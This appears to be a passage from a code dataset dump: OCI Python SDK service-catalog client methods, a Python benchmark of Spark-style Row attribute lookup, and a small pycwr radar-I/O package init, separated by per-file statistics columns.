        "content-type": "application/json",
        "opc-request-id": kwargs.get("opc_request_id", missing)
    }
    header_params = {key: val for (key, val) in six.iteritems(header_params) if val is not missing and val is not None}

    retry_strategy = self.base_client.get_preferred_retry_strategy(
        operation_retry_strategy=kwargs.get('retry_strategy'),
        client_retry_strategy=self.retry_strategy
    )

    # Same arguments are used for both the retried and the direct call.
    call_kwargs = dict(
        resource_path=resource_path,
        method=method,
        query_params=query_params,
        header_params=header_params,
        response_type="ServiceCatalogAssociationCollection")

    if not retry_strategy:
        return self.base_client.call_api(**call_kwargs)

    if not isinstance(retry_strategy, retry.NoneRetryStrategy):
        self.base_client.add_opc_client_retries_header(header_params)
        retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
    return retry_strategy.make_retrying_call(self.base_client.call_api, **call_kwargs)
def list_service_catalogs(self, compartment_id, **kwargs):
    """
    Lists all the service catalogs in the given compartment.

    :param str compartment_id: (required)
        The unique identifier for the compartment.
    :param str service_catalog_id: (optional)
        The unique identifier for the service catalog.
    :param str opc_request_id: (optional)
        Unique Oracle-assigned identifier for the request.
    :param int limit: (optional)
        How many records to return. Greater than zero, at most 1000; default 30.
    :param str page: (optional)
        The value of the `opc-next-page` response header from the previous \"List\" call.
    :param str sort_by: (optional)
        Default is `TIMECREATED`. Allowed values are: "TIMECREATED"
    :param str sort_order: (optional)
        The sort order to apply, either `ASC` or `DESC`. Default is `ASC`.
    :param obj retry_strategy: (optional)
        A retry strategy for this specific call; overrides any client-level
        strategy. Pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`
        to explicitly disable retries.
    :param str display_name: (optional)
        Exact match name filter.
    :return: A :class:`~oci.response.Response` object with data of type
        :class:`~oci.service_catalog.models.ServiceCatalogCollection`
    :rtype: :class:`~oci.response.Response`
    """
    resource_path = "/serviceCatalogs"
    method = "GET"

    # Reject any keyword arguments this operation does not understand.
    expected_kwargs = [
        "retry_strategy",
        "service_catalog_id",
        "opc_request_id",
        "limit",
        "page",
        "sort_by",
        "sort_order",
        "display_name"
    ]
    extra_kwargs = [name for name in six.iterkeys(kwargs) if name not in expected_kwargs]
    if extra_kwargs:
        raise ValueError(
            "list_service_catalogs got unknown kwargs: {!r}".format(extra_kwargs))

    # Enum-style parameters accept only a fixed set of values; absent means OK.
    if kwargs.get('sort_by', "TIMECREATED") not in ["TIMECREATED"]:
        raise ValueError(
            "Invalid value for `sort_by`, must be one of {0}".format(["TIMECREATED"]))
    if kwargs.get('sort_order', "ASC") not in ["ASC", "DESC"]:
        raise ValueError(
            "Invalid value for `sort_order`, must be one of {0}".format(["ASC", "DESC"]))

    # Keep only the optional parameters that were actually supplied.
    candidate_query = [
        ("compartmentId", compartment_id),
        ("serviceCatalogId", kwargs.get("service_catalog_id", missing)),
        ("limit", kwargs.get("limit", missing)),
        ("page", kwargs.get("page", missing)),
        ("sortBy", kwargs.get("sort_by", missing)),
        ("sortOrder", kwargs.get("sort_order", missing)),
        ("displayName", kwargs.get("display_name", missing))
    ]
    query_params = dict((k, v) for (k, v) in candidate_query if v is not missing and v is not None)

    candidate_headers = [
        ("accept", "application/json"),
        ("content-type", "application/json"),
        ("opc-request-id", kwargs.get("opc_request_id", missing))
    ]
    header_params = dict((k, v) for (k, v) in candidate_headers if v is not missing and v is not None)

    retry_strategy = self.base_client.get_preferred_retry_strategy(
        operation_retry_strategy=kwargs.get('retry_strategy'),
        client_retry_strategy=self.retry_strategy
    )

    call_kwargs = dict(
        resource_path=resource_path,
        method=method,
        query_params=query_params,
        header_params=header_params,
        response_type="ServiceCatalogCollection")
    if not retry_strategy:
        return self.base_client.call_api(**call_kwargs)
    if not isinstance(retry_strategy, retry.NoneRetryStrategy):
        # Tag the request so the service can tell client-side retries are active.
        self.base_client.add_opc_client_retries_header(header_params)
        retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
    return retry_strategy.make_retrying_call(self.base_client.call_api, **call_kwargs)
def list_work_request_errors(self, work_request_id, **kwargs):
    """
    Return a (paginated) list of errors for a given work request.

    :param str work_request_id: (required)
        The ID of the asynchronous request.
    :param str opc_request_id: (optional)
        Unique Oracle-assigned identifier for the request.
    :param str page: (optional)
        The value of the `opc-next-page` response header from the previous \"List\" call.
    :param int limit: (optional)
        How many records to return. Greater than zero, at most 1000; default 30.
    :param str sort_by: (optional)
        The field to sort by. Allowed values are: "timeAccepted"
    :param str sort_order: (optional)
        The sort order to apply, either `ASC` or `DESC`. Default is `ASC`.
    :param obj retry_strategy: (optional)
        A retry strategy for this specific call; overrides any client-level
        strategy. Pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`
        to explicitly disable retries.
    :return: A :class:`~oci.response.Response` object with data of type
        :class:`~oci.service_catalog.models.WorkRequestErrorCollection`
    :rtype: :class:`~oci.response.Response`
    """
    resource_path = "/workRequests/{workRequestId}/errors"
    method = "GET"

    # Reject any keyword arguments this operation does not understand.
    expected_kwargs = [
        "retry_strategy",
        "opc_request_id",
        "page",
        "limit",
        "sort_by",
        "sort_order"
    ]
    extra_kwargs = [name for name in six.iterkeys(kwargs) if name not in expected_kwargs]
    if extra_kwargs:
        raise ValueError(
            "list_work_request_errors got unknown kwargs: {!r}".format(extra_kwargs))

    # Path parameters must be present and non-blank before templating the URL.
    path_params = {
        "workRequestId": work_request_id
    }
    path_params = dict((k, v) for (k, v) in six.iteritems(path_params) if v is not missing)
    for (k, v) in six.iteritems(path_params):
        if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
            raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))

    # Enum-style parameters accept only a fixed set of values; absent means OK.
    if kwargs.get('sort_by', "timeAccepted") not in ["timeAccepted"]:
        raise ValueError(
            "Invalid value for `sort_by`, must be one of {0}".format(["timeAccepted"]))
    if kwargs.get('sort_order', "ASC") not in ["ASC", "DESC"]:
        raise ValueError(
            "Invalid value for `sort_order`, must be one of {0}".format(["ASC", "DESC"]))

    # Keep only the optional parameters that were actually supplied.
    candidate_query = [
        ("page", kwargs.get("page", missing)),
        ("limit", kwargs.get("limit", missing)),
        ("sortBy", kwargs.get("sort_by", missing)),
        ("sortOrder", kwargs.get("sort_order", missing))
    ]
    query_params = dict((k, v) for (k, v) in candidate_query if v is not missing and v is not None)

    candidate_headers = [
        ("accept", "application/json"),
        ("content-type", "application/json"),
        ("opc-request-id", kwargs.get("opc_request_id", missing))
    ]
    header_params = dict((k, v) for (k, v) in candidate_headers if v is not missing and v is not None)

    retry_strategy = self.base_client.get_preferred_retry_strategy(
        operation_retry_strategy=kwargs.get('retry_strategy'),
        client_retry_strategy=self.retry_strategy
    )

    call_kwargs = dict(
        resource_path=resource_path,
        method=method,
        path_params=path_params,
        query_params=query_params,
        header_params=header_params,
        response_type="WorkRequestErrorCollection")
    if not retry_strategy:
        return self.base_client.call_api(**call_kwargs)
    if not isinstance(retry_strategy, retry.NoneRetryStrategy):
        # Tag the request so the service can tell client-side retries are active.
        self.base_client.add_opc_client_retries_header(header_params)
        retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
    return retry_strategy.make_retrying_call(self.base_client.call_api, **call_kwargs)
def list_work_request_logs(self, work_request_id, **kwargs):
    """
    Return a (paginated) list of logs for a given work request.

    :param str work_request_id: (required)
        The ID of the asynchronous request.
    :param str opc_request_id: (optional)
        Unique Oracle-assigned identifier for the request.
    :param str page: (optional)
        The value of the `opc-next-page` response header from the previous \"List\" call.
    :param int limit: (optional)
        How many records to return. Greater than zero, at most 1000; default 30.
    :param str sort_by: (optional)
        The field to sort by. Allowed values are: "timeAccepted"
    :param str sort_order: (optional)
        The sort order to apply, either `ASC` or `DESC`. Default is `ASC`.
    :param obj retry_strategy: (optional)
        A retry strategy for this specific call; overrides any client-level
        strategy. Pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`
        to explicitly disable retries.
    :return: A :class:`~oci.response.Response` object with data of type
        :class:`~oci.service_catalog.models.WorkRequestLogEntryCollection`
    :rtype: :class:`~oci.response.Response`
    """
    resource_path = "/workRequests/{workRequestId}/logs"
    method = "GET"

    # Reject any keyword arguments this operation does not understand.
    expected_kwargs = [
        "retry_strategy",
        "opc_request_id",
        "page",
        "limit",
        "sort_by",
        "sort_order"
    ]
    extra_kwargs = [name for name in six.iterkeys(kwargs) if name not in expected_kwargs]
    if extra_kwargs:
        raise ValueError(
            "list_work_request_logs got unknown kwargs: {!r}".format(extra_kwargs))

    # Path parameters must be present and non-blank before templating the URL.
    path_params = {
        "workRequestId": work_request_id
    }
    path_params = dict((k, v) for (k, v) in six.iteritems(path_params) if v is not missing)
    for (k, v) in six.iteritems(path_params):
        if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
            raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))

    # Enum-style parameters accept only a fixed set of values; absent means OK.
    if kwargs.get('sort_by', "timeAccepted") not in ["timeAccepted"]:
        raise ValueError(
            "Invalid value for `sort_by`, must be one of {0}".format(["timeAccepted"]))
    if kwargs.get('sort_order', "ASC") not in ["ASC", "DESC"]:
        raise ValueError(
            "Invalid value for `sort_order`, must be one of {0}".format(["ASC", "DESC"]))

    # Keep only the optional parameters that were actually supplied.
    candidate_query = [
        ("page", kwargs.get("page", missing)),
        ("limit", kwargs.get("limit", missing)),
        ("sortBy", kwargs.get("sort_by", missing)),
        ("sortOrder", kwargs.get("sort_order", missing))
    ]
    query_params = dict((k, v) for (k, v) in candidate_query if v is not missing and v is not None)

    candidate_headers = [
        ("accept", "application/json"),
        ("content-type", "application/json"),
        ("opc-request-id", kwargs.get("opc_request_id", missing))
    ]
    header_params = dict((k, v) for (k, v) in candidate_headers if v is not missing and v is not None)

    retry_strategy = self.base_client.get_preferred_retry_strategy(
        operation_retry_strategy=kwargs.get('retry_strategy'),
        client_retry_strategy=self.retry_strategy
    )

    call_kwargs = dict(
        resource_path=resource_path,
        method=method,
        path_params=path_params,
        query_params=query_params,
        header_params=header_params,
        response_type="WorkRequestLogEntryCollection")
    if not retry_strategy:
        return self.base_client.call_api(**call_kwargs)
    if not isinstance(retry_strategy, retry.NoneRetryStrategy):
        # Tag the request so the service can tell client-side retries are active.
        self.base_client.add_opc_client_retries_header(header_params)
        retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
    return retry_strategy.make_retrying_call(self.base_client.call_api, **call_kwargs)
def list_work_requests(self, **kwargs):
    """
    Lists the work requests in a compartment.

    :param str compartment_id: (optional)
        The unique identifier for the compartment.
    :param str work_request_id: (optional)
        The ID of the asynchronous work request.
    :param str status: (optional)
        Filter to resources whose lifecycleState matches the given
        OperationStatus. Allowed values are: "ACCEPTED", "FAILED", "SUCCEEDED"
    :param str resource_id: (optional)
        The ID of the resource affected by the work request.
    :param str opc_request_id: (optional)
        Unique Oracle-assigned identifier for the request.
    :param str page: (optional)
        The value of the `opc-next-page` response header from the previous \"List\" call.
    :param int limit: (optional)
        How many records to return. Greater than zero, at most 1000; default 30.
    :param str sort_order: (optional)
        The sort order to apply, either `ASC` or `DESC`. Default is `ASC`.
    :param str sort_by: (optional)
        The field to sort by. Allowed values are: "timeAccepted"
    :param obj retry_strategy: (optional)
        A retry strategy for this specific call; overrides any client-level
        strategy. Pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`
        to explicitly disable retries.
    :return: A :class:`~oci.response.Response` object with data of type
        :class:`~oci.service_catalog.models.WorkRequestSummaryCollection`
    :rtype: :class:`~oci.response.Response`
    """
    resource_path = "/workRequests"
    method = "GET"

    # Reject any keyword arguments this operation does not understand.
    expected_kwargs = [
        "retry_strategy",
        "compartment_id",
        "work_request_id",
        "status",
        "resource_id",
        "opc_request_id",
        "page",
        "limit",
        "sort_order",
        "sort_by"
    ]
    extra_kwargs = [name for name in six.iterkeys(kwargs) if name not in expected_kwargs]
    if extra_kwargs:
        raise ValueError(
            "list_work_requests got unknown kwargs: {!r}".format(extra_kwargs))

    # Enum-style parameters accept only a fixed set of values; absent means OK.
    if kwargs.get('status', "ACCEPTED") not in ["ACCEPTED", "FAILED", "SUCCEEDED"]:
        raise ValueError(
            "Invalid value for `status`, must be one of {0}".format(["ACCEPTED", "FAILED", "SUCCEEDED"]))
    if kwargs.get('sort_order', "ASC") not in ["ASC", "DESC"]:
        raise ValueError(
            "Invalid value for `sort_order`, must be one of {0}".format(["ASC", "DESC"]))
    if kwargs.get('sort_by', "timeAccepted") not in ["timeAccepted"]:
        raise ValueError(
            "Invalid value for `sort_by`, must be one of {0}".format(["timeAccepted"]))

    # Keep only the optional parameters that were actually supplied.
    candidate_query = [
        ("compartmentId", kwargs.get("compartment_id", missing)),
        ("workRequestId", kwargs.get("work_request_id", missing)),
        ("status", kwargs.get("status", missing)),
        ("resourceId", kwargs.get("resource_id", missing)),
        ("page", kwargs.get("page", missing)),
        ("limit", kwargs.get("limit", missing)),
        ("sortOrder", kwargs.get("sort_order", missing)),
        ("sortBy", kwargs.get("sort_by", missing))
    ]
    query_params = dict((k, v) for (k, v) in candidate_query if v is not missing and v is not None)

    candidate_headers = [
        ("accept", "application/json"),
        ("content-type", "application/json"),
        ("opc-request-id", kwargs.get("opc_request_id", missing))
    ]
    header_params = dict((k, v) for (k, v) in candidate_headers if v is not missing and v is not None)

    retry_strategy = self.base_client.get_preferred_retry_strategy(
        operation_retry_strategy=kwargs.get('retry_strategy'),
        client_retry_strategy=self.retry_strategy
    )

    call_kwargs = dict(
        resource_path=resource_path,
        method=method,
        query_params=query_params,
        header_params=header_params,
        response_type="WorkRequestSummaryCollection")
    if not retry_strategy:
        return self.base_client.call_api(**call_kwargs)
    if not isinstance(retry_strategy, retry.NoneRetryStrategy):
        # Tag the request so the service can tell client-side retries are active.
        self.base_client.add_opc_client_retries_header(header_params)
        retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
    return retry_strategy.make_retrying_call(self.base_client.call_api, **call_kwargs)
def update_private_application(self, private_application_id, update_private_application_details, **kwargs):
    """
    Updates the details of an existing private application.

    :param str private_application_id: (required)
        The unique identifier for the private application.
    :param oci.service_catalog.models.UpdatePrivateApplicationDetails update_private_application_details: (required)
        The details for updating the private application.
    :param str opc_request_id: (optional)
        Unique Oracle-assigned identifier for the request.
    :param str if_match: (optional)
        For optimistic concurrency control: the etag from a previous GET or
        POST response. The resource is updated only if the etag still matches.
    :param obj retry_strategy: (optional)
        A retry strategy for this specific call; overrides any client-level
        strategy. Pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`
        to explicitly disable retries.
    :return: A :class:`~oci.response.Response` object with data of type
        :class:`~oci.service_catalog.models.PrivateApplication`
    :rtype: :class:`~oci.response.Response`
    """
    resource_path = "/privateApplications/{privateApplicationId}"
    method = "PUT"

    # Reject any keyword arguments this operation does not understand.
    expected_kwargs = [
        "retry_strategy",
        "opc_request_id",
        "if_match"
    ]
    extra_kwargs = [name for name in six.iterkeys(kwargs) if name not in expected_kwargs]
    if extra_kwargs:
        raise ValueError(
            "update_private_application got unknown kwargs: {!r}".format(extra_kwargs))

    # Path parameters must be present and non-blank before templating the URL.
    path_params = {
        "privateApplicationId": private_application_id
    }
    path_params = dict((k, v) for (k, v) in six.iteritems(path_params) if v is not missing)
    for (k, v) in six.iteritems(path_params):
        if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
            raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))

    candidate_headers = [
        ("accept", "application/json"),
        ("content-type", "application/json"),
        ("opc-request-id", kwargs.get("opc_request_id", missing)),
        ("if-match", kwargs.get("if_match", missing))
    ]
    header_params = dict((k, v) for (k, v) in candidate_headers if v is not missing and v is not None)

    retry_strategy = self.base_client.get_preferred_retry_strategy(
        operation_retry_strategy=kwargs.get('retry_strategy'),
        client_retry_strategy=self.retry_strategy
    )

    call_kwargs = dict(
        resource_path=resource_path,
        method=method,
        path_params=path_params,
        header_params=header_params,
        body=update_private_application_details,
        response_type="PrivateApplication")
    if not retry_strategy:
        return self.base_client.call_api(**call_kwargs)
    if not isinstance(retry_strategy, retry.NoneRetryStrategy):
        # Tag the request so the service can tell client-side retries are active.
        self.base_client.add_opc_client_retries_header(header_params)
        retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
    return retry_strategy.make_retrying_call(self.base_client.call_api, **call_kwargs)
def update_service_catalog(self, service_catalog_id, update_service_catalog_details, **kwargs):
    """
    Updates the details of a previously created service catalog.

    :param str service_catalog_id: (required)
        The unique identifier for the service catalog.
    :param oci.service_catalog.models.UpdateServiceCatalogDetails update_service_catalog_details: (required)
        Details to update for a service catalog.
    :param str opc_request_id: (optional)
        Unique Oracle-assigned identifier for the request.
    :param str if_match: (optional)
        For optimistic concurrency control: the etag from a previous GET or
        POST response. The resource is updated only if the etag still matches.
    :param obj retry_strategy: (optional)
        A retry strategy for this specific call; overrides any client-level
        strategy. Pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`
        to explicitly disable retries.
    :return: A :class:`~oci.response.Response` object with data of type
        :class:`~oci.service_catalog.models.ServiceCatalog`
    :rtype: :class:`~oci.response.Response`
    """
    resource_path = "/serviceCatalogs/{serviceCatalogId}"
    method = "PUT"

    # Reject any keyword arguments this operation does not understand.
    expected_kwargs = [
        "retry_strategy",
        "opc_request_id",
        "if_match"
    ]
    extra_kwargs = [name for name in six.iterkeys(kwargs) if name not in expected_kwargs]
    if extra_kwargs:
        raise ValueError(
            "update_service_catalog got unknown kwargs: {!r}".format(extra_kwargs))

    # Path parameters must be present and non-blank before templating the URL.
    path_params = {
        "serviceCatalogId": service_catalog_id
    }
    path_params = dict((k, v) for (k, v) in six.iteritems(path_params) if v is not missing)
    for (k, v) in six.iteritems(path_params):
        if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
            raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))

    candidate_headers = [
        ("accept", "application/json"),
        ("content-type", "application/json"),
        ("opc-request-id", kwargs.get("opc_request_id", missing)),
        ("if-match", kwargs.get("if_match", missing))
    ]
    header_params = dict((k, v) for (k, v) in candidate_headers if v is not missing and v is not None)

    retry_strategy = self.base_client.get_preferred_retry_strategy(
        operation_retry_strategy=kwargs.get('retry_strategy'),
        client_retry_strategy=self.retry_strategy
    )

    call_kwargs = dict(
        resource_path=resource_path,
        method=method,
        path_params=path_params,
        header_params=header_params,
        body=update_service_catalog_details,
        response_type="ServiceCatalog")
    if not retry_strategy:
        return self.base_client.call_api(**call_kwargs)
    if not isinstance(retry_strategy, retry.NoneRetryStrategy):
        # Tag the request so the service can tell client-side retries are active.
        self.base_client.add_opc_client_retries_header(header_params)
        retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
    return retry_strategy.make_retrying_call(self.base_client.call_api, **call_kwargs)
| 49.432099
| 268
| 0.653354
| 16,264
| 132,132
| 5.116884
| 0.032218
| 0.066233
| 0.018841
| 0.00572
| 0.911116
| 0.895615
| 0.87842
| 0.868783
| 0.863628
| 0.854904
| 0
| 0.001281
| 0.267278
| 132,132
| 2,672
| 269
| 49.450599
| 0.858298
| 0.407259
| 0
| 0.820619
| 0
| 0
| 0.159237
| 0.03652
| 0
| 0
| 0
| 0
| 0
| 1
| 0.018557
| false
| 0.000687
| 0.006186
| 0
| 0.061168
| 0.000687
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
3dbd0f548c183e0fa94fb303f2bcba72893a33a1
| 8,984
|
py
|
Python
|
spark/python/benchmark_SPARK_9488.py
|
0x0FFF/experiments
|
c9533c6ad6141a48303a43947d89f2322aeed70d
|
[
"Apache-2.0"
] | null | null | null |
spark/python/benchmark_SPARK_9488.py
|
0x0FFF/experiments
|
c9533c6ad6141a48303a43947d89f2322aeed70d
|
[
"Apache-2.0"
] | null | null | null |
spark/python/benchmark_SPARK_9488.py
|
0x0FFF/experiments
|
c9533c6ad6141a48303a43947d89f2322aeed70d
|
[
"Apache-2.0"
] | null | null | null |
import random
import time
from hashlib import md5
def _create_row(fields, values):
    # Rebuild a Row from positional values, then attach its field names.
    # Used by Row.__call__ and as the pickle constructor in Row.__reduce__.
    new_row = Row(*values)
    new_row.__fields__ = fields
    return new_row
class Row(tuple):
    """
    A row in L{DataFrame}. The fields in it can be accessed like attributes.

    Create a row with named arguments (fields are sorted by name):

    >>> row = Row(name="Alice", age=11)
    >>> row
    Row(age=11, name='Alice')
    >>> row.name, row.age
    ('Alice', 11)

    Or create a Row-like class from field names and instantiate it:

    >>> Person = Row("name", "age")
    >>> Person
    <Row(name, age)>
    >>> Person("Alice", 11)
    Row(name='Alice', age=11)
    """

    def __new__(self, *args, **kwargs):
        if args and kwargs:
            raise ValueError("Can not use both args "
                             "and kwargs to create Row")
        if args:
            # Positional form: either a row "class" (field names) or raw values.
            return tuple.__new__(self, args)
        if kwargs:
            # Keyword form: values are stored in field-name-sorted order.
            sorted_names = sorted(kwargs.keys())
            new_row = tuple.__new__(self, [kwargs[name] for name in sorted_names])
            new_row.__fields__ = sorted_names
            return new_row
        raise ValueError("No args or kwargs")

    def asDict(self, recursive=False):
        """
        Return the row as a dict.

        :param recursive: turns nested Rows into dicts (default: False).

        >>> Row(name="Alice", age=11).asDict() == {'name': 'Alice', 'age': 11}
        True
        >>> row = Row(key=1, value=Row(name='a', age=2))
        >>> row.asDict(True) == {'key': 1, 'value': {'name': 'a', 'age': 2}}
        True
        """
        if not hasattr(self, "__fields__"):
            raise TypeError("Cannot convert a Row class into dict")
        if not recursive:
            return dict(zip(self.__fields__, self))

        def _unpack(value):
            # Recursively convert Rows (and containers holding Rows) to dicts.
            if isinstance(value, Row):
                return value.asDict(True)
            if isinstance(value, list):
                return [_unpack(item) for item in value]
            if isinstance(value, dict):
                return dict((key, _unpack(item)) for key, item in value.items())
            return value

        return dict(zip(self.__fields__, (_unpack(item) for item in self)))

    # let object acts like class
    def __call__(self, *args):
        """create new Row object"""
        return _create_row(self, args)

    def __getattr__(self, item):
        # Dunder lookups are never treated as field names.
        if item.startswith("__"):
            raise AttributeError(item)
        try:
            # Linear scan: slow with many fields, but fine for normal use.
            return self[self.__fields__.index(item)]
        except (IndexError, ValueError):
            raise AttributeError(item)

    def __setattr__(self, key, value):
        # Only the field-name list may be bound; rows are otherwise frozen.
        if key == '__fields__':
            self.__dict__[key] = value
        else:
            raise Exception("Row is read-only")

    def __reduce__(self):
        """Returns a tuple so Python knows how to pickle Row."""
        if hasattr(self, "__fields__"):
            return (_create_row, (self.__fields__, tuple(self)))
        return tuple.__reduce__(self)

    def __repr__(self):
        """Printable representation of Row used in Python REPL."""
        if hasattr(self, "__fields__"):
            pairs = ("%s=%r" % pair for pair in zip(self.__fields__, tuple(self)))
            return "Row(%s)" % ", ".join(pairs)
        return "<Row(%s)>" % ", ".join(self)
def _create_indexed_row(fields, values):
    # Rebuild a Row from positional values and attach both the field-name
    # list and a name->position index for O(1) attribute lookup.
    new_row = Row(*values)
    new_row.__fields__ = fields
    new_row.__fieldindex__ = dict(zip(fields, range(len(fields))))
    return new_row
class IndexedRow(tuple):
    """
    A Row variant that keeps a name->position index (``__fieldindex__``)
    so attribute access is a dict lookup instead of a linear scan.

    Create a row with named arguments (fields are sorted by name):

    >>> row = Row(name="Alice", age=11)
    >>> row
    Row(age=11, name='Alice')
    >>> row.name, row.age
    ('Alice', 11)

    Or create a Row-like class from field names and instantiate it:

    >>> Person = Row("name", "age")
    >>> Person
    <Row(name, age)>
    >>> Person("Alice", 11)
    Row(name='Alice', age=11)
    """

    def __new__(self, *args, **kwargs):
        if args and kwargs:
            raise ValueError("Can not use both args "
                             "and kwargs to create Row")
        if args:
            # Positional form: either a row "class" (field names) or raw values.
            return tuple.__new__(self, args)
        if kwargs:
            # Keyword form: values stored in field-name-sorted order,
            # plus a name->position index for fast attribute lookup.
            sorted_names = sorted(kwargs.keys())
            new_row = tuple.__new__(self, [kwargs[name] for name in sorted_names])
            new_row.__fields__ = sorted_names
            new_row.__fieldindex__ = dict(zip(sorted_names, range(len(sorted_names))))
            return new_row
        raise ValueError("No args or kwargs")

    def asDict(self, recursive=False):
        """
        Return the row as a dict.

        :param recursive: turns nested Rows into dicts (default: False).

        >>> Row(name="Alice", age=11).asDict() == {'name': 'Alice', 'age': 11}
        True
        """
        if not hasattr(self, "__fields__"):
            raise TypeError("Cannot convert a Row class into dict")
        if not recursive:
            return dict(zip(self.__fields__, self))

        def _unpack(value):
            # Recursively convert Rows (and containers holding Rows) to dicts.
            if isinstance(value, Row):
                return value.asDict(True)
            if isinstance(value, list):
                return [_unpack(item) for item in value]
            if isinstance(value, dict):
                return dict((key, _unpack(item)) for key, item in value.items())
            return value

        return dict(zip(self.__fields__, (_unpack(item) for item in self)))

    # let object acts like class
    def __call__(self, *args):
        """create new Row object"""
        return _create_indexed_row(self, args)

    def __getattr__(self, item):
        # Dunder lookups are never treated as field names.
        if item.startswith("__"):
            raise AttributeError(item)
        try:
            # Dict lookup instead of list.index -- the point of this class.
            return self[self.__fieldindex__[item]]
        except (IndexError, ValueError, KeyError):
            raise AttributeError(item)

    def __setattr__(self, key, value):
        # Only the field metadata may be bound; rows are otherwise frozen.
        if key in ('__fields__', '__fieldindex__'):
            self.__dict__[key] = value
        else:
            raise Exception("Row is read-only")

    def __reduce__(self):
        """Returns a tuple so Python knows how to pickle Row."""
        if hasattr(self, "__fields__"):
            return (_create_indexed_row, (self.__fields__, tuple(self)))
        return tuple.__reduce__(self)

    def __repr__(self):
        """Printable representation of Row used in Python REPL."""
        if hasattr(self, "__fields__"):
            pairs = ("%s=%r" % pair for pair in zip(self.__fields__, tuple(self)))
            return "Row(%s)" % ", ".join(pairs)
        return "<Row(%s)>" % ", ".join(self)
def generate_field_list(num, seed=None):
    """Return ``num`` distinct synthetic field names for benchmark rows.

    Each name is 'f' followed by a 32-char md5 hex digest, so it is a valid
    identifier. The whole batch is regenerated until all names are distinct
    (collisions are astronomically unlikely for small ``num``).

    :param num: number of distinct field names to produce
    :param seed: optional seed so the output is reproducible
    """
    random.seed(seed)
    fields = []
    # Retry until the batch contains `num` distinct names.
    while len(set(fields)) != num:
        # .encode() is required on Python 3, where hashlib.md5 only accepts
        # bytes; it is also valid on Python 2.
        fields = ['f' + md5(('field' + str(random.randint(0, 10000000))).encode()).hexdigest()
                  for _ in range(num)]
    return fields
def generate_data(fields, seed=None):
    """Build one synthetic record mapping each field to a random value.

    For each field, first a coin flip chooses the value kind (so the RNG
    call order matches the original implementation), then either a random
    int or a 32-char md5 hex string is drawn.

    :param fields: iterable of field names to populate
    :param seed: optional seed so the output is reproducible
    """
    random.seed(seed)
    res = {}
    for f in fields:
        if random.random() < 0.5:
            res[f] = random.randint(1, 1000000000)
        else:
            # .encode() is required on Python 3, where hashlib.md5 only
            # accepts bytes; it is also valid on Python 2.
            res[f] = md5(('field' + str(random.randint(0, 10000000))).encode()).hexdigest()
    return res
def test(row, fields, num):
    """Benchmark creating and attribute-querying ``num`` row objects.

    :param row: Row-like class to benchmark (e.g. Row or IndexedRow)
    :param fields: field names used for every generated object
    :param num: number of objects to create
    """
    data = generate_data(fields)
    num_fields = len(fields)
    start = time.time()
    ds = [row(**data) for _ in range(num)]
    # Parenthesized single-argument print works on both Python 2 and 3
    # (the original bare print statement was Python 2 only).
    print('Created %10d %s objects with %3d fields in %6.2f sec' %
          (num, row.__name__, num_fields, time.time() - start))
    start = time.time()
    for field in fields:
        # Touch every object once per field; only the lookup cost matters,
        # so the result list is discarded (the old `tds` binding was unused).
        [r.__getattr__(field) for r in ds]
    print('Queried %10d %s objects with %3d fields in %6.2f sec' %
          (num, row.__name__, num_fields, time.time() - start))
def main():
    """Run the benchmark for both row implementations over 1..100 fields."""
    row_classes = (Row, IndexedRow)
    for row_class in row_classes:
        for field_count in range(1, 101):
            test(row_class, generate_field_list(field_count), 1000000)


if __name__ == "__main__":
    main()
| 31.412587
| 117
| 0.54675
| 1,122
| 8,984
| 4.171123
| 0.154189
| 0.023932
| 0.020513
| 0.023932
| 0.839744
| 0.836752
| 0.836752
| 0.836752
| 0.818803
| 0.800855
| 0
| 0.015897
| 0.327805
| 8,984
| 285
| 118
| 31.522807
| 0.759066
| 0.03484
| 0
| 0.71875
| 0
| 0
| 0.078836
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.01875
| null | null | 0.0125
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
3dcfee446a3876c1eab5362ab5513a5986b3b371
| 3,573
|
py
|
Python
|
pycwr/io/__init__.py
|
1271756664/study
|
8013dd6c597618949c5fcbf86e38502525a8136d
|
[
"MIT"
] | 144
|
2019-11-27T14:36:41.000Z
|
2022-02-23T08:21:17.000Z
|
pycwr/io/__init__.py
|
1271756664/study
|
8013dd6c597618949c5fcbf86e38502525a8136d
|
[
"MIT"
] | 32
|
2019-11-29T10:11:53.000Z
|
2022-03-14T07:46:44.000Z
|
pycwr/io/__init__.py
|
1271756664/study
|
8013dd6c597618949c5fcbf86e38502525a8136d
|
[
"MIT"
] | 57
|
2019-11-27T12:51:44.000Z
|
2022-01-29T14:50:05.000Z
|
from . import SCFile, WSR98DFile, SABFile, CCFile, PAFile
from .util import radar_format
__all__ = ["read_auto", "CCFile", "SCFile", "WSR98DFile", "SABFile"]
